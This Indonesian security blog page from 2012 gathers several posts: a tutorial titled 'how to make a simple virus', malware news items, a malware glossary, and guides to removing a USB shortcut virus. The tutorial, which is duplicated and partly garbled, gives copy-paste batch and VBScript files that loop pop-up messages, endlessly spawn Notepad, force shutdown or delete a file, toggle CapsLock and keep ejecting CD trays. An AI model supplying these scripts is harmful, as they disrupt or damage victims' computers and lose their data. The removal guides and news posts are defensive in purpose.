Recent Post
Showing posts with label virus. Show all posts
Showing posts with label virus. Show all posts
Cara Membuat Virus Sederhana
Ahmad Zaeni Dahlan | 26 April 2012 | 4:11 PM
ini adalah cara membuat virus yg sederhana saya rasa semua orang bisa
melakukannya!!
hanya dengan notepad dan kemampuan copy-paste anda sudah bisa!!
langsung aja ok!!
1. Message yg muncul terus menerus
cara nya buka notepad lalu masukan script di bawah ini :
bisa dirubah sesuai keinginan anda!
simpan dengan berekstensi .bat contoh cyber4rt.bat
2. pertanyaan menjebak
script nya
simpan dengan .bat contoh contoh = quizcyber4rt.bat
3. Membuka notepad terus-menerus
script nya
sama simpan dengan .bat
4. komputer mati sendiri dan ngirim message
simpan dengan .vbs
5. buka tutup cd room terus menerus
simpan dengan .vbs
Selamat mencoba dan semoga bermanfaat tapi jangan di gunakan untuk kejahatan dan balas dendam, ok!!!
hanya dengan notepad dan kemampuan copy-paste anda sudah bisa!!
langsung aja ok!!
1. Message yg muncul terus menerus
cara nya buka notepad lalu masukan script di bawah ini :
@ECHO off
:<br />
Begin<br />
msg * Lagi ngapain ?<br />
msg * Hayo buka apa ?<br />
msg * Nanti dimarahin ama mak loe<br />
msg * Makannya jangan sembrono !<br />
msg * minta bantuan gih sono !<br />
msg * Udah instal ulang aja !!!!<br />
msg * tit............................
GOTO BEGIN</div>
bisa dirubah sesuai keinginan anda!
simpan dengan berekstensi .bat contoh cyber4rt.bat
2. pertanyaan menjebak
script nya
@echo off
title quiz hari ini
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top
simpan dengan .bat contoh contoh = quizcyber4rt.bat
3. Membuka notepad terus-menerus
script nya
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top
sama simpan dengan .bat
4. komputer mati sendiri dan ngirim message
script nya
Set wshShell
=wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
simpan dengan .vbs
5. buka tutup cd room terus menerus
script nya
Set oWMP = CreateObject
("WMPlayer.OCX.7")
Set colCDROMs =
oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
simpan dengan .vbs
Selamat mencoba dan semoga bermanfaat tapi jangan di gunakan untuk kejahatan dan balas dendam, ok!!!
Malware Baru Di Android Menyebar Via SMS
Unknown | 22 April 2012 | 4:44 AM
Amerika Serikat - Malware kembali menyerang perangkat berbasis Android. UpdtBot, demikian namanya, ditemukan NQ Mobile Security Research Center dan diketahui menyebar melalui pesan singkat atau SMS.
Seperti dikutip detikINET dari Ubergizmo, Sabtu (15/4/2012), malware ini menyamar dalam bentuk SMS yang meminta pengguna mengklik link untuk mengupdate sistem di ponsel mereka.
Celakanya, ketika link ini diklik, secara otomatis si pengguna menginstal UpdtBot. Selanjutnya, malware tersebut akan berkomunikasi dengan server jahat yang bisa mengendalikan dan memberi perintah dari jarak jauh.
Nah, aplikasi jahat ini lantas memungkinkan perangkat mengirim SMS, membuat panggilan telepon dan mendownload serta menginstal aplikasi tanpa sepengetahuan pengguna. Terang saja, ini bisa mengakibatkan kantong bolong karena pulsa akan tersedot habis.
NQ Mobile Security Research Center memperkirakan ada 160 ribu perangkat yang terinfeksi UpdtBot. Untuk mencegahnya, pastikan hanya mengunduh aplikasi dari sumber terpercaya. Sebelumnya, cek juga review dan komentar pengguna yang sudah memakainya untuk memastikan aplikasi tersebut aman.
Sumber: http://manisoo.blogspot.com
20.000 Situs Internet Diharap Waspada Serangan Malware
Rudi Cyber4rt | 21 April 2012 | 12:31 PM
Cyber4rt | Sekitar 20.000 situs di internet telah diperingatkan untuk waspada terhadap serangan program jahat oleh Google. Google menduga serangan terjadi melalui JavaScript. Kemungkinan ada pihak yang tidak bertanggung jawab menyusupkan kode JavaScript di situs-situs tersebut. Karena itulah pengelola diminta segera melakukan pembersihan.
Tim dari Google mengingatkan pemilik situs untuk mencari file yang berisi konten "eval(function(p,a,c,k,e,r)". Kode tersebut dapat ditempatkan dalam file HTML, JavaScript, atau PHP.
"JavaScript disusupkan oleh pihak ketiga dan dapat digunakan untuk mengarahkan pengguna ke situs berbahaya," kata tim Google Search Quality.
Selain itu, Google juga memperingatkan kepada pemilik situs agar selalu menghapus malware dan memperbaiki kerentanan situs. Hal itu dilakukan untuk melindungi pengunjung situs. Mereka juga didesak untuk menjaga kebaruan software dan segera menghubungi web hosting masing-masing untuk mendapat bantuan. Ini bukan pertama kali Google memperingatkan pemilik situs web untuk mewaspadai serangan hacker, khususnya yang menyusupkan malware.
"Google membantu pemilik web untuk mencegah spam. Ini bukan fenomena baru. Kami selalu terbuka dengan webmaster, dan kami akan selalu melakukannya," ujar Mark JAnsen, Juru Bicara google indonesia
di tahun 2011 lalu, Google mencantumkan 11 juta url dengan domain .co.cc dari hasil pencariannya. Gara-garan domain ini virus malware semakin menyebarluas..
Via Autorun, Serangan Malware Lewat USB Meningkat
Cyber4rt | 14 April 2012 | 4:33 PM
Serangan program jahat (malware) yang datang melalui e-mail, drive-by download, link berbahaya hingga pop-up yang menyesatkan meningkat tajam. Serangan ini banyak datang melalui perangkat-perangkat USB.
Menurut Avast Software, sekitar 13,5 persen dari 700.000 serangan yang direkam oleh sistem Community IQ Avast pada bulan Oktober berasal dari USB. Menurutnya, 60 persen dari malware yang beredar saat ini dapat menyebar melalui USB.
Ketika sebuah perangkat USB sudah terinfeksi dengan worm/virus tertentu lalu dihubungkan ke PC, sebuah file executable (exe) akan aktif dan men-download malware ke dalam PC. Malware ini kemudian akan menginfeksi sistem operasi dan dapat mereplikasi dirinya sendiri setiap kali komputer di-restart.
Dan tidak mengejutkan lagi, bahwa perangkat yang paling umum dimanfaatkan pembuat virus untuk menyebarkan malware adalah USB flash drive. Selain harganya yang murah dan bisa didapat di mana-mana, USB drive adalah mimpi buruk bagi admin dari sisi keamanan.
Parahnya lagi, seiring semakin besarnya kapasitas USB yang muncul di pasaran, user semakin ?malas? memindai (scan) USB tersebut dengan software keamanan. Hanya sedikit pengguna komputer yang memindai hard drive 1TB sampai selesai setelah men-download file atau film misalnya.
Selain USB flash disk dan removable drive, semua perangkat penyimpanan berbasis USB, termasuk kamera digital, ponsel, mp3 player, dan bahkan PSP juga perlu di-scanning.
Untuk melindungi PC dari infeksi malware via USB, coba terapkan beberapa tips berikut ini :
- Jangan menyalakan PC jika perangkat USB masih tertancap di komputer. Menghidupkan PC dengan perangkat USB masih terpasang di komputer dapat mengakibatkan malware di-load ke dalam PC Anda sebelum program antivirus aktif.
- Scan terlebih dahulu. Pastikan bahwa Anda telah mengaktifkan fitur auto-scan pada aplikasi antivirus Anda.
- Matikan fitur AutoPlay.
Courtesy Of PC Magazine
Perbedaan antara Virus, Worm, Trojan, Backdoor, Malware dan Spyware
Masih banyak sekali orang yang bingung dan tabu tentang perbedaan virus, worm, trojan, backdoor, malware, dan spyware. Tidak sengaja saya mendapatkan penjelasan yang menarik dan mudah dicerna, penjelasan berikut bertujuan agar pembaca lebih mengerti dan paham supaya lebih bijak menggunakan antivirus dalam komputer pribadi masing2...dan tidak asal delete, tidak semua file yang ditangkap oleh antivirus itu membahayakan buat PC, contohnya source program php sederhana bisa dikenali sebagai trojan oleh AV padahal itu tidak berbahaya sama sekali..
Ok langsung aja cekiprot, beberapa kaliamt saya recycle supaya mudah dipahami :)
Virus
Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali.
Virus komputer umumnya dapat merusak perangkat lunak komputer dan tidak dapat secara langsung merusak perangkat keras komputer (terutama pada sistem operasi , seperti sistem operasi berbasis keluarga Windows (Windows 95, Windows 98/98SE, Windows NT, Windows NT Server, Windows 2000, Windows 2000 Server, Windows 2003, Windows 2003 Server, Windows XP Home Edition, Windows XP Professional, Windows XP Servicepack 1, Windows XP Servicepack 2 yang terbaru pun Windows Vista dan Win7 bahkan baru2 ini sudah merambah ke GNU/Linux. Efek negatif virus komputer terutama adalah perbanyakan dirinya sendiri, yang membuat sumber daya pada komputer (seperti CPU Time, penggunaan memori) menjadi berkurang secara signifikan. Hampir 95% Virus adalah virus komputer berbasis sistem operasi Windows. Sisanya, 2% menyerang Linux/GNU (dan Unix, sebagai source dari Linux, tentunya), 1% menyerang Mac terutama Mac OS 9, Mac OS X (Tiger, Leopard). 2% lagi menyerang sistem operasi lain seperti FreeBSD, OS/2 IBM, dan Sun Operating System.
Serangan virus dapat dicegah atau ditanggulangi dengan menggunakan perangkat lunak antivirus. Jenis perangkat lunak ini dapat juga mendeteksi dan menghapus virus komputer, asalkan basis data virus komputer yang dimiliki oleh perangkat lunak antivirus telah mengandung kode untuk menghapus virus tersebut atau dengan kata lain telah up to date.
Beberapa Contoh antivirus yang bisa diandalkan dan menangkal virus adalah KasperSky, AVG, NOD32, AntiVir, PCMAV, Norton, Norman, dan McAfee dan masig banyak lagi bahkan Antivirus lokal pun sekarang mulai marak dibicarakan Seperti Smadav, Ansav dll, dan yang terbaru Artav.
Worm
Worm adalah jenis virus yang tidak menginfeksi program lainnya.
Ia membuat copy dirinya sendiri (Cloning) dan menginfeksi komputer lainnya (biasanya menggunakan hubungan jaringan) tetapi tidak mengkaitkan dirinya dengan program lainnya; akan tetapi sebuah worm dapat mengubah atau merusak file dan program.
Trojan
Trojan adalah replika atau duplikat virus. Trojan dimasukan sebagai virus karena sifat program yang tidak diinginkan dan bekerja dengan sendirinya pada sebuah computer. Sifat trojan adalah mengkontrol computer secara otomatis. Misalnya computer yang dimasuki trojan email. Trojan dimasukan dalam RATS (remote administration tools) dimana sebuah computer dikontrol oleh program tertentu, bahkan beberapa trojan difungsikan membuka computer agar dapat dimasuki oleh computer dan diaccess dari jauh, bahkan beberapa RAT's terbaru sudah mempnyai fungsi yang lebih lengkap diantaranya dilengkapi fungsi keylogger dll, bahkan bisa memerintahkan komputer yg terinfeksi sebagai pasukan untuk menyerang (Baca:Bot)
Backdoor
Backdoor atau "pintu belakang", dalam keamanan sistem komputer, merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya). Disebut juga sebagai back door.
Backdoor pada awalnya dibuat oleh para programer komputer sebagai mekanisme yang mengizinkan mereka untuk memperoleh akses khusus ke dalam program mereka, seringnya digunakan untuk membenarkan dan memperbaiki kode di dalam program yang mereka buat ketika sebuah crash akibat bug terjadi. Salah satu contoh dari pernyataan ini adalah ketika Kenneth Thompson (salah seorang pemrogram sistem operasi UNIX membuat sebuah program proses login pada tahun 1983 ketika memperoleh Turing Award), selain program login umum digunakan dalam sistem operasi UNIX dengan menggunakan bahasa pemrograman C, sehingga ia dapat mengakses sistem UNIX yang berjalan di dalam jaringan internal Bell Labs. Backdoor yang ia ciptakan itu melindungi dirinya dari pendeteksian dan pembuangan dari sistem, meskipun pengguna berhasil menemukannya, karena memang backdoor ini membuat dirinya sendiri kembali (melakukan rekompilasi sendiri).
Beberapa pengembang perangkat lunak menambahkan backdoor ke dalam program buatannya untuk tujuan merusak (atau tujuan yang mencurigakan). Sebagai contoh, sebuah backdoor dapat dimasukkan ke dalam kode di dalam sebuah situs belanja online (e-commerce) untuk mengizinkan pengembang tersebut memperoleh informasi mengenai transaksi yang terjadi antara pembeli dan penjual, termasuk di antaranya adalah kartu kredit, dalam hal ini biasanya disisipkan kedalah shell code sehingga pemilik shell bisa leluasa mendapatka info apapun tentang host :)
Istilah backdoor sekarang digunakan oleh hacker-hacker untuk merujuk kepada mekanisme yang mengizinkan seorang peretas sistem dapat mengakses kembali sebuah sistem yang telah diserang sebelumnya tanpa harus mengulangi proses eksploitasi terhadap sistem atau jaringan tersebut, seperti yang ia lakukan pertama kali. Umumnya, setelah sebuah jaringan telah diserang dengan menggunakan exploit (terhadap sebuah kerawanan/vulnerability), seorang penyerang akan menutupi semua jejaknya di dalam sistem yang bersangkutan dengan memodifikasi berkas catatan sistem (log) atau menghapusnya, dan kemudian menginstalasikan sebuah backdoor (Shell code) yang berupa sebuah perangkat lunak khusus atau menambahkan sebuah akun pengguna yang memiliki hak akses sebagai administrator jaringan atau administrator sistem tersebut. Jika kemudian pemilik jaringan atau sistem tersebut menyadari bahwa sistemnya telah diserang, dan kemudian menutup semua kerawanan yang diketahui dalam sistemnya (tapi tidak mendeteksi adanya backdoor yang terinstalasi), penyerang yang sebelumnya masih akan dapat mengakses sistem yang bersangkutan, tanpa ketahuan oleh pemilik jaringan, apalagi setelah dirinya mendaftarkan diri sebagai pengguna yang sah di dalam sistem atau jaringan tersebut. Dengan memiliki hak sebagai administrator jaringan, ia pun dapat melakukan hal yang dapat merusak sistem atau menghilangkan data. Dalam kasus seperti di atas, cara yang umum digunakan adalah dengan melakukan instalasi ulang terhadap sistem atau jaringan, atau dengan melakukan restorasi dari cadangan/backup yang masih bersih dari backdoor.
Ada beberapa perangkat yang dapat digunakan untuk menginstalasikan backdoor, seperti halnya beberapa Trojan horse, tetapi yang populer adalah Netcat (jaman jadul), yang dapat digunakan di dalam sistem operasi Windows ataupun UNIX. Sekarang fungsi sudah tergantikan oleh beberapa Rat's terbaru seperti cybergate, poison ivy prorat dll..(backdoor dan trojan saling melengkapi)
Malware
Malware adalah program komputer yang diciptakan dengan maksud dan tujuan utama mencari kelemahan software. Umumnya Malware diciptakan untuk membobol atau merusak suatu software atau operating sistem.
Contoh dari malware adalah Virus, Worm, Wabbit, Keylogger, Browser Hijacker, Trojan Horse, Spyware, Backdoor, Dialer, Exploit dan rootkit .
Spyware
Spyware adalah perangkat lunak yang mengumpulkan dan mengirim informasi tentang pengguna komputer tanpa diketahui oleh si pengguna itu.
Informasinya bisa yang tidak terlampau berbahaya seperti pola berkomputer, terutama berinternet, seseorang sampai yang berbahaya seperti nomor kartu kredit, PIN untuk perbankan elektronik (e-banking) dan password suatu account.
Informasi tentang pola berinternet, telah disebutkan, tidak terlampau berbahaya. Situs yang dikunjungi, informasi yang kerap dicari, obrolan di ruang chat akan dimata-matai oleh si spyware.
Selanjutnya, informasi itu digunakan untuk menampilkan iklan yang biasanya berupa jendela pop-up. Iklan itu berhubungan dengan kebiasaan seseorang berinternet. Misalnya kerap kali seseorang mencari informasi mengenai kamera digital. Jendela pop-up yang muncul akan menampilkan, misalnya situs yang berdagang kamera digital. Adware adalah istilah untuk spyware yang begini.
Penyebaran spyware mirip dengan Trojan. Contohnya, flashget. Ketika flashget yang dipakai belum diregister, flashget bertindak sebagai spyware. Coba saja hubungkan diri ke internet, jalankan flashget yang belum diregister, cuekin computer beberapa saat, pasti muncul jendela internet explorer yang menampilkan iklan suatu situs.
Untuk mengantisipasi Virus-virus komputer yang semakin mengganas, pastikan komputer anda selalu terproteksi dengan antivirus yang up to date..dan jangan lupa pakai AV yang sudah dilengkapi dengan Internet Security klo perlu tambahkan Firewall untuk keamanan yang berlapis guna melindungi PC anda dari serangan langsung maupun tidak langsung.
Semoga Bermanfaat ^_^
Courtesy : maurizalwepe88
Recycled : my22n
Ok langsung aja cekiprot, beberapa kaliamt saya recycle supaya mudah dipahami :)
Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali.
Virus komputer umumnya dapat merusak perangkat lunak komputer dan tidak dapat secara langsung merusak perangkat keras komputer (terutama pada sistem operasi , seperti sistem operasi berbasis keluarga Windows (Windows 95, Windows 98/98SE, Windows NT, Windows NT Server, Windows 2000, Windows 2000 Server, Windows 2003, Windows 2003 Server, Windows XP Home Edition, Windows XP Professional, Windows XP Servicepack 1, Windows XP Servicepack 2 yang terbaru pun Windows Vista dan Win7 bahkan baru2 ini sudah merambah ke GNU/Linux. Efek negatif virus komputer terutama adalah perbanyakan dirinya sendiri, yang membuat sumber daya pada komputer (seperti CPU Time, penggunaan memori) menjadi berkurang secara signifikan. Hampir 95% Virus adalah virus komputer berbasis sistem operasi Windows. Sisanya, 2% menyerang Linux/GNU (dan Unix, sebagai source dari Linux, tentunya), 1% menyerang Mac terutama Mac OS 9, Mac OS X (Tiger, Leopard). 2% lagi menyerang sistem operasi lain seperti FreeBSD, OS/2 IBM, dan Sun Operating System.
Serangan virus dapat dicegah atau ditanggulangi dengan menggunakan perangkat lunak antivirus. Jenis perangkat lunak ini dapat juga mendeteksi dan menghapus virus komputer, asalkan basis data virus komputer yang dimiliki oleh perangkat lunak antivirus telah mengandung kode untuk menghapus virus tersebut atau dengan kata lain telah up to date.
Beberapa Contoh antivirus yang bisa diandalkan dan menangkal virus adalah KasperSky, AVG, NOD32, AntiVir, PCMAV, Norton, Norman, dan McAfee dan masig banyak lagi bahkan Antivirus lokal pun sekarang mulai marak dibicarakan Seperti Smadav, Ansav dll, dan yang terbaru Artav.
Worm
Worm adalah jenis virus yang tidak menginfeksi program lainnya.
Ia membuat copy dirinya sendiri (Cloning) dan menginfeksi komputer lainnya (biasanya menggunakan hubungan jaringan) tetapi tidak mengkaitkan dirinya dengan program lainnya; akan tetapi sebuah worm dapat mengubah atau merusak file dan program.
Trojan
Trojan adalah replika atau duplikat virus. Trojan dimasukan sebagai virus karena sifat program yang tidak diinginkan dan bekerja dengan sendirinya pada sebuah computer. Sifat trojan adalah mengkontrol computer secara otomatis. Misalnya computer yang dimasuki trojan email. Trojan dimasukan dalam RATS (remote administration tools) dimana sebuah computer dikontrol oleh program tertentu, bahkan beberapa trojan difungsikan membuka computer agar dapat dimasuki oleh computer dan diaccess dari jauh, bahkan beberapa RAT's terbaru sudah mempnyai fungsi yang lebih lengkap diantaranya dilengkapi fungsi keylogger dll, bahkan bisa memerintahkan komputer yg terinfeksi sebagai pasukan untuk menyerang (Baca:Bot)
Backdoor
Backdoor atau "pintu belakang", dalam keamanan sistem komputer, merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya). Disebut juga sebagai back door.
Backdoor pada awalnya dibuat oleh para programer komputer sebagai mekanisme yang mengizinkan mereka untuk memperoleh akses khusus ke dalam program mereka, seringnya digunakan untuk membenarkan dan memperbaiki kode di dalam program yang mereka buat ketika sebuah crash akibat bug terjadi. Salah satu contoh dari pernyataan ini adalah ketika Kenneth Thompson (salah seorang pemrogram sistem operasi UNIX membuat sebuah program proses login pada tahun 1983 ketika memperoleh Turing Award), selain program login umum digunakan dalam sistem operasi UNIX dengan menggunakan bahasa pemrograman C, sehingga ia dapat mengakses sistem UNIX yang berjalan di dalam jaringan internal Bell Labs. Backdoor yang ia ciptakan itu melindungi dirinya dari pendeteksian dan pembuangan dari sistem, meskipun pengguna berhasil menemukannya, karena memang backdoor ini membuat dirinya sendiri kembali (melakukan rekompilasi sendiri).
Beberapa pengembang perangkat lunak menambahkan backdoor ke dalam program buatannya untuk tujuan merusak (atau tujuan yang mencurigakan). Sebagai contoh, sebuah backdoor dapat dimasukkan ke dalam kode di dalam sebuah situs belanja online (e-commerce) untuk mengizinkan pengembang tersebut memperoleh informasi mengenai transaksi yang terjadi antara pembeli dan penjual, termasuk di antaranya adalah kartu kredit, dalam hal ini biasanya disisipkan kedalah shell code sehingga pemilik shell bisa leluasa mendapatka info apapun tentang host :)
Istilah backdoor sekarang digunakan oleh hacker-hacker untuk merujuk kepada mekanisme yang mengizinkan seorang peretas sistem dapat mengakses kembali sebuah sistem yang telah diserang sebelumnya tanpa harus mengulangi proses eksploitasi terhadap sistem atau jaringan tersebut, seperti yang ia lakukan pertama kali. Umumnya, setelah sebuah jaringan telah diserang dengan menggunakan exploit (terhadap sebuah kerawanan/vulnerability), seorang penyerang akan menutupi semua jejaknya di dalam sistem yang bersangkutan dengan memodifikasi berkas catatan sistem (log) atau menghapusnya, dan kemudian menginstalasikan sebuah backdoor (Shell code) yang berupa sebuah perangkat lunak khusus atau menambahkan sebuah akun pengguna yang memiliki hak akses sebagai administrator jaringan atau administrator sistem tersebut. Jika kemudian pemilik jaringan atau sistem tersebut menyadari bahwa sistemnya telah diserang, dan kemudian menutup semua kerawanan yang diketahui dalam sistemnya (tapi tidak mendeteksi adanya backdoor yang terinstalasi), penyerang yang sebelumnya masih akan dapat mengakses sistem yang bersangkutan, tanpa ketahuan oleh pemilik jaringan, apalagi setelah dirinya mendaftarkan diri sebagai pengguna yang sah di dalam sistem atau jaringan tersebut. Dengan memiliki hak sebagai administrator jaringan, ia pun dapat melakukan hal yang dapat merusak sistem atau menghilangkan data. Dalam kasus seperti di atas, cara yang umum digunakan adalah dengan melakukan instalasi ulang terhadap sistem atau jaringan, atau dengan melakukan restorasi dari cadangan/backup yang masih bersih dari backdoor.
Ada beberapa perangkat yang dapat digunakan untuk menginstalasikan backdoor, seperti halnya beberapa Trojan horse, tetapi yang populer adalah Netcat (jaman jadul), yang dapat digunakan di dalam sistem operasi Windows ataupun UNIX. Sekarang fungsi sudah tergantikan oleh beberapa Rat's terbaru seperti cybergate, poison ivy prorat dll..(backdoor dan trojan saling melengkapi)
Malware
Malware adalah program komputer yang diciptakan dengan maksud dan tujuan utama mencari kelemahan software. Umumnya Malware diciptakan untuk membobol atau merusak suatu software atau operating sistem.
Contoh dari malware adalah Virus, Worm, Wabbit, Keylogger, Browser Hijacker, Trojan Horse, Spyware, Backdoor, Dialer, Exploit dan rootkit .
Spyware
Spyware adalah perangkat lunak yang mengumpulkan dan mengirim informasi tentang pengguna komputer tanpa diketahui oleh si pengguna itu.
Informasinya bisa yang tidak terlampau berbahaya seperti pola berkomputer, terutama berinternet, seseorang sampai yang berbahaya seperti nomor kartu kredit, PIN untuk perbankan elektronik (e-banking) dan password suatu account.
Informasi tentang pola berinternet, telah disebutkan, tidak terlampau berbahaya. Situs yang dikunjungi, informasi yang kerap dicari, obrolan di ruang chat akan dimata-matai oleh si spyware.
Selanjutnya, informasi itu digunakan untuk menampilkan iklan yang biasanya berupa jendela pop-up. Iklan itu berhubungan dengan kebiasaan seseorang berinternet. Misalnya kerap kali seseorang mencari informasi mengenai kamera digital. Jendela pop-up yang muncul akan menampilkan, misalnya situs yang berdagang kamera digital. Adware adalah istilah untuk spyware yang begini.
Penyebaran spyware mirip dengan Trojan. Contohnya, flashget. Ketika flashget yang dipakai belum diregister, flashget bertindak sebagai spyware. Coba saja hubungkan diri ke internet, jalankan flashget yang belum diregister, cuekin computer beberapa saat, pasti muncul jendela internet explorer yang menampilkan iklan suatu situs.
Untuk mengantisipasi Virus-virus komputer yang semakin mengganas, pastikan komputer anda selalu terproteksi dengan antivirus yang up to date..dan jangan lupa pakai AV yang sudah dilengkapi dengan Internet Security klo perlu tambahkan Firewall untuk keamanan yang berlapis guna melindungi PC anda dari serangan langsung maupun tidak langsung.
Semoga Bermanfaat ^_^
Courtesy : maurizalwepe88
Recycled : my22n
Cara Menghapus Virus SHORTCUT
Cyber4rt | 13 April 2012 | 5:26 PM
CARA 1
Berikut 8 langkah praktis untuk mendepak virus yang mampu mengubah folder yang ada di dalam USB flash disk menjadi shortcut tersebut:
1. Nonaktifkan System Restore untuk sementara selama proses pembersihan.
2. Putuskan komputer yang akan dibersihkan dari jaringan.
3. Matikan proses virus yang aktif di memori dengan menggunakan tools Ice Sword. Setelah tools tersebut terinstal, pilih file yang mempunyai icon Microsoft Visual Basic Project kemudian klik Terminate Process. Silahkan download tools tersebut di http://icesword.en.softonic.com/
4. Hapus registri yang sudah dibuat oleh virus dengan cara:
- Klik menu [Start]
- Klik [Run]
- Ketik REGEDIT.exe, kemudian klik tombol [OK]
- Pada aplikasi Registry Editor, telusuri key [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
- Kemudian hapus key yang mempunyai data [C:\Document and Settings\%user%].
[Version]
Signature=?$Chicago$?
Provider=Vaksincom
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKLM, Software\CLASSES\batfile\shell\open\command,,,?"?%1″? %*?
HKLM, Software\CLASSES\comfile\shell\open\command,,,?"?%1″? %*?
HKLM, Software\CLASSES\exefile\shell\open\command,,,?"?%1″? %*?
HKLM, Software\CLASSES\piffile\shell\open\command,,,?"?%1″? %*?
HKLM, Software\CLASSES\regfile\shell\open\command,,,?regedit.exe ?%1″?
HKLM, Software\CLASSES\scrfile\shell\open\command,,,?"?%1″? %*?
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoDriveTypeAutoRun,0x000000ff,255
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer, NoDriveTypeAutoRun,0x000000ff,255
6. Hapus File induk dan file duplikat yang dibuat oleh virus termasuk di flash disk. Untuk mempercepat proses pencarian, Anda dapat menggunakan fungsi ?Search?. Sebelum melakukan pencarian sebaiknya tampilkan semua file yang tersembunyi dengan mengubah pada setting Folder Options.
Jangan sampai terjadi kesalahan pada saat menghapus file induk maupun file duplikat yang telah dibuat oleh virus. Lalu hapus file induk virus yang mempunyai ciri-ciri:
-. Icon Microsoft Visual Basic Project.
-. Ukuran File 128 KB (untuk varian lain akan mempunyai ukuran yang bervariasi).
-. Ekstesi file .EXE atau .SCR.
-. Type file Application atau Screen Saver.
Kemudian hapus File duplikat shortcut yang mempunyai ciri-ciri:
- Icon Folder atau icon
- Ekstensi .LNK
- Type File Shortcut
- Ukuran file 1 KB
7. Tampilkan kembali folder yang telah disembunyikan oleh virus. Untuk mempercepat proses tersebut, silahkan download tools UnHide File and Folder di http://www.flashshare.com/bfu/download.html
Atau gunakan perintah berikut pada CMD
Code:
attrib -r -s -h -a "D:\NAMA_FILE_ATAU_FOLDER"
Setelah diinstall, pilih direktori [C:\Documents and settings] dan folder yang ada di flash disk dengan cara menggeser ke kolom yang sudah tersedia. Pada menu [Attributes] kosongkan semua pilihan yang ada, kemudian klik tombol [Change Attributes].
8. Install security patch Microsoft Windows Shell shortcut handling remote code execution vulnerability-MS10-046. Silakan download security patch tersebut di http://www.microsoft.com/technet/security/Bulletin/MS10-046.mspx
Seperti biasa, untuk pembersihan secara optimal dan menecegah infeksi ulang, sebaiknya install dan scan dengan antivirus yang up-to-date dan sudah dapat mendeteksi virus ini dengan baik.
CARA 2
Ciri-ciri virus shortcut :
Pertama-tama, setelah menginfeksi komputer, dia akan membuat file induk database.mdb di My Documents
Yang kedua adalah virus tersebut akan membuat file autorun.inf di setiap drive harddisk, flash disk, dan folder tanpa kecuali.
Yang ketiga adalah dia akan membuat file Thumb.db (hati-hati, perhatikan bahwa file ini tanpa huruf s sedangkan thumbnail cache yang asli di komputer memiliki tambahan huruf s alias thumbs.db) di setiap folder
Untuk memancing korban, dia akan membuat file Microsoft.lnk dan New Harry Potter and?.lnk di setiap folder yang jika dieksekusi akan langsung mengaktifkan virus tersebut.
Seperti halnya virus-virus lokal lainnya, dia akan membuat duplikat setiap folder namun kali ini bukan dengan ekstensi .exe melainkan extensi .ink alias shortcut.
Pada task manager terdapat proses services wscript.exe yang sedang berjalan. Dalam kondisi normal, tidak ada proses seperti ini.
Langkah-langkah menghapus virus shortcut :
1. Matikan System Restore. Sejak dulu saya selalu mematikan system restore segera setelah proses instalasi windows. Untuk keperluan backup dan imaging system, saya lebih memilih menggunakan third party seperti acronis ataupun Norton Ghost (baca dan dowload : Norton Ghost 15.0.0.35659 (2010) Full Serial Crack)
2. Matikan proses virus wsrcipt.exe (C:\WINDOWS\System32\wscript.exe)
Bisa menggunakan Process Explorer atau misc. tool pada HijackThis (baca dan download : HijackThis 2.0.2 ).
3. Hapus file virus database.mdb di My Documents..
4. Hapus file duplikat virus..
Untuk proses penghapusan, anda bisa menggunakan fasilitas search pada Windows.. Pada ?More advanced options?, pastikan option ?Search system folders? dan ?Search hidden files and folders? keduanya telah dicentang.
Search file dengan nama autorun.inf ukurannya 8 KB
Search file dengan nama Thumb.db ukurannya 8 KB
Search file dengan ekstensi .lnk.lnk ukurannya 1 KB
Hapus semua file yang ditemukan..
Untuk lebih memudahkan proses pencarian yang sekaligus menghapus file yang ditemukan, anda bisa menggunakan software UTool, sebuah freeware yang dapat anda download secara gratis. Program ini akan secara otomatis mencari dan kemudian menghapus file-file yang diinginkan (lihat gambar).
5. Hapus registry Autorun yang dibuat virus dengan menggunakan HijackThis..
Cari di bagian HKCU\..\Run: yang berhubungan dengan file database.mdb (pada gambar namun file database.mdb udah saya hapus)
Untuk lebih memantabkan proses pencegahan dan melindungi komputer kita dari serangan virus lokal yang sangat memusingkan ini, anda dapat melakukan hal-hal berikut:
1. Setelah proses instalasi windows, segera matikan system restore.
